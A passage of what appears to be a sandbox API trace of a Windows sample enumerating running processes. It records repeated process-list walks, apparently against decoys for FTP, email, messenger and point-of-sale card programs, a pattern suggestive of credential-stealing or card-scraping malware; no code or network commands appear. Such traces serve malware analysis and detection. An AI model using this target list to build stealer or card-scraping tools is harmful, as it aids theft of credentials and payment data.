th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0224.535] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0224.538] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0224.542] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0224.552] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0224.555] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0224.558] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0224.561] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0224.565] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0224.568] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0224.570] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0224.574] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0224.577] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0224.580] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0224.586] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0224.593] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0224.596] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0224.599] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0224.602] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0224.605] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0224.609] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0224.612] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0224.614] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0224.617] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0224.620] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0224.623] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0224.626] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0224.635] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0224.638] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0224.641] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0224.644] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0224.647] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0224.650] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0224.652] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0224.655] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0224.658] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0224.662] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0224.664] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0224.667] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0224.669] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0224.675] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0224.678] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0224.681] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0224.685] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0224.691] CloseHandle (hObject=0x21ac) returned 1 [0224.691] Sleep (dwMilliseconds=0x64) [0224.818] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18ec [0224.830] Process32First (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0224.833] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0224.834] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0224.836] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0224.838] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0224.840] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0224.842] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0224.844] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0224.846] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0224.847] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.849] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.851] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0224.922] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.924] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.926] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.927] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.023] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.024] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.026] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.028] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0225.030] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0225.032] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x31, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0225.034] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0225.036] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.046] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0225.048] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0225.050] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0225.052] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0225.054] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0225.056] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0225.093] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.095] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0225.097] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0225.099] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0225.102] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.104] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0225.105] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0225.107] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0225.110] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0225.113] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0225.115] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, 